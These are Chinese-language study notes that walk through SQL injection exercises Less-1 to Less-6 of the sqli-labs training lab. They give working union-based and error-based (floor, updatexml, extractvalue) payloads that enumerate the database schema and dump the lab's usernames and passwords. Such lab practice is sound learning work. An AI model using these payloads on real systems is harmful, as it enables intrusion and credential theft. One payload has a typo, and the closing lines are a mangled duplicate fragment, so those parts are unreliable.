SQL/Less-1
单引号字符串型回显注入
1.判断闭合字符
http://182.92.220.201/Less-1/?id=1'
#报错信息use near ''1'' LIMIT 0,1' at line 1
http://182.92.220.201/Less-1/?id=1' and 1=1 -- =
#正常
#注意:注释符--后面要有空格
http://182.92.220.201/Less-1/?id=1' and 1=2 -- =
#异常
http://182.92.220.201/Less-1/?id=1 and 1=2 -- =
#正常
#初步判断为单引号字符型注入
2.求列数
http://182.92.220.201/Less-1/?id=1' order by 4 -- =
#报错
http://182.92.220.201/Less-1/?id=1' order by 3-- =
#正常
3.求显示位
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,3 -- =
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CUFRpLGF-1597242111390)(D:\桌面文档\渗透测试\笔记\学习笔记\照片\image-20200811112128016.png)]
4.爆库名
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,database() -- =
#爆出库名security
5.爆表名
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#爆出表名emails,referers,uagents,users
6.爆列名
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- =
#爆出列名id,username,password
7.爆字段
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(id,username,password) from security.users -- =
#字段内容
/*1DumbDumb,2AngelinaI-kill-you,3Dummyp@ssword,4securecrappy,5stupidstupidity,6supermangenious,7batmanmob!le,8adminadmin,9admin1admin1,10admin2admin2,11admin3admin3,12dhakkandumbo,14admin4admin4
上面的显示很难区分字段 ,所以添加0x23 */
http://172.168.30.176/Less-1/?id=1' and 1=2 union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =
#结果如下图所述
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fyENTk27-1597242111397)(D:\桌面文档\渗透测试\笔记\学习笔记\照片\image-20200811114035849.png)]
SQL/Less-2
1.判断闭合字符
?id=1'
#报错信息use near '' LIMIT 0,1' at line 1
?id=1' and 1=1 -- =
#报错
?id=1 and 1=1
#正常
?id=1 and 1=2 -- =
#异常
#初步判断为数字型SQL注入
2.求列数
?id=1 order by 4 -- =
#报错
?id=1 order by 3 -- =
#有回显,判断为3列
3.得显示位
?id=1 and 1=2 union select 1,2,3 -- =
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pUcCBA8h-1597242111400)(D:\桌面文档\渗透测试\笔记\学习笔记\照片\image-20200811115537668.png)]
4.爆库名
?id =1 and 1=2 union select 1,2,database() -- =
#爆出库名security
5.爆表名
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#表名emails,referers,uagents,users
6.爆列名
?id = 1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_anme='users' -- =
#列名id,username,password
7.爆字段
?id=1 and 1=2 union select 1,2,group_concat(0x3a,id,0x3a,username,0x3a,password) from security.users -- =
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jnaSJKmH-1597242111406)(image-20200811123529323.png)]
SQL/Less-3
1.判断闭合字符
http://172.168.30.176/Less-3/?id=1'
#报错信息use near ''1'') LIMIT 0,1' at line 1
http://172.168.30.176/Less-3/?id=1' and 1=1 -- =
#报错
?id=1 and 1=1 -- =
?id=1" and 1=1 -- =
#均不报错
?id=1 and 1=2 -- =
?id=1' and 1=2 -- =
?id=1" and 1=2 -- =
#都显示正常,只能尝试其他字符
http://172.168.30.176/Less-3/?id=1') and 1=2 -- =
#最后发现id=1') and 1=2 -- =异常
?id=1') and 1=1 -- =
#显示正常
#初步判断为单引号变形字符型注入
2.求列数
http://172.168.30.176/Less-3/?id=1') order by 3 -- =
#有回显
http://172.168.30.176/Less-3/?id=1') order by 4 -- =
#报错
#判断列数为3列
3.求显示位
http://172.168.30.176/Less-3/?id=1') and 1=2 union select 1,2,3 -- =
#显示位在2,3列
4.爆库名
http://172.168.30.176/Less-3/?id=1') and 1=2 union select 1,2,database()-- =
#得库名security
?id=-1%27)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23
#爆所有数据库的名称
5.爆表名
?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- =
#表名emails,referers,uagents,users
6.爆列名
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- =
#列名id,username,password
7.爆字段
?id=-1') union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =
SQL/Less-4
1.判断闭合字符
http://172.168.30.176/Less-4/?id=1'
#正常,且有回显
http://172.168.30.176/Less-4/?id=1"
#报错信息use near ''1'') LIMIT 0,1' at line 1
http://172.168.30.176/Less-4/?id=1") and 1=1 -- =
#正常
http://172.168.30.176/Less-4/?id=1") and 1=2 -- =
#异常
#初步判断为括号双引号字符型注入
2.求列数
http://172.168.30.176/Less-4/?id=1") order by 3-- =
3.求显示位
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,3-- =
#显示位在2,3列
4.爆库名
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,database()-- =
#得库名security
#爆所有数据库的名称
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata -- =
5.爆表名
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- =
#表名emails,referers,uagents,users
6.爆列名
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- =
#列名id,username,password
7.爆字段
http://172.168.30.176/Less-4/?id=1") and 1=2 union select 1,2,group_concat(0x23,id,0x23,username,0x23,password) from security.users -- =
SQL/Less-5
1.判断闭合字符
?id=1'
#报错信息use near ''1'' LIMIT 0,1' at line 1
http://172.168.30.176/Less-5/?id=1' and 1=1 -- =
#
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Rm5WsyU-1597242111409)(照片/image-20200812112914454.png)]
http://172.168.30.176/Less-5/?id=1' and 1=2 -- =
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PeeJw2hn-1597242111412)(照片/image-20200812113021609.png)]
初步判断为无回显的单引号注入
2.求列数
http://172.168.30.176/Less-5/?id=1' order by 3-- =
3.求显示位
http://172.168.30.176/Less-5/?id=1' and 1=2 union select 1,2,3 -- =
#无回显,只能进行盲注
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bCDF5UAF-1597242111414)(照片/image-20200812113329701.png)]
4.爆库名
第一种方法使用floor()报错函数参考文章:https://www.cnblogs.com/-zhong/p/10892439.html
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果Duplicate entry 'security0' for key 'group_key'
第二种方法采用报错函数UPDATEXML (XML_document, XPath_string, new_value)
第一个参数:这一项可以用一个十六进制的字符代替,如"0x23"
第二个参数:报错注入时需要写入错误的格式来显示错误的信息
第三个参数:报错注入时可以加入任何字符
http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select concat(database())),0x7e),1) -- =
#结果显示 XPATH syntax error: '~security~'
5.爆表名
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#表名emails,referers,uagents,users
第二方法
http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,( select group_concat(table_name) from information_schema.tables where table_schema='security' ) ,0x7e),1) -- =
#结果 XPATH syntax error: '~emails,referers,uagents,users~'
6.爆列名
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果显示Duplicate entry 'username0' for key 'group_key'
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果显示 Duplicate entry 'password0' for key 'group_key'
第二种方法
http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,( select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ,0x7e),1) -- =
7.爆字段
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果为 Duplicate entry 'Dumb0' for key 'group_key'
http://172.168.30.176/Less-5/?id=-1' union select null,count(*),concat((select username from users limit 1,1),floor(rand()*2)) as a from information_schema.tables group by a -- =
#结果为 Duplicate entry 'Angelina1' for key 'group_key'
#这种方法只能一个个去爆字段
#实际上使用group_concat函数,就可以一下爆出所有字段
http://172.168.30.176/Less-5/?id=-1' and updatexml(1,concat(0x7e,( select group_concat(0x23,username,0x23,password) from security.users) ,0x7e),1) -- =
#结果XPATH syntax error: '~#Dumb#Dumb,#Angelina#I-kill-you'
SQL/Less-6
1.判断闭合字符
http://172.168.30.176/Less-6/?id=1'
#显示正常,尝试双引号
http://172.168.30.176/Less-6/?id=1"
#报错信息syntax to use near '"1"" LIMIT 0,1' at line 1
http://172.168.30.176/Less-6/?id=1" and 1=1 -- =
#正常
http://172.168.30.176/Less-6/?id=1" and 1=2 -- =
#异常
#初步判断为括号双引号字符型注入
2.求列数
http://172.168.30.176/Less-6/?id=1" order by 4 -- =
3.求显示位
http://172.168.30.176/Less-6/?id=-1" union select 1,2,3 -- =
#无回显,考虑报错注入
这次使用extractvalue(,)报错函数
第一个参数:可以用十六进制字符或者整数代替
第二个参数:用于写注入语句
4.爆库名
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,database())) -- =
#返回值为XPATH syntax error: 'security'
5.爆表名
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) -- =
#返回值XPATH syntax error: 'emails,referers,uagents,users'
6.爆列名
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) -- =
#返回值XPATH syntax error: 'id,username,password'
7.爆字段
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(0x23,username,0x23,password) from security.users))) -- =
#返回值XPATH syntax error: '#Dumb#Dumb,#Angelina#I-kill-you,'
6/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’))) – =
#返回值XPATH syntax error: ‘id,username,password’
## 7.爆字段
```SQL
http://172.168.30.176/Less-6/?id=-1" and extractvalue(1,concat(1,2,(select group_concat(0x23,username,0x23,password) from security.users))) -- =
#返回值XPATH syntax error: '#Dumb#Dumb,#Angelina#I-kill-you,'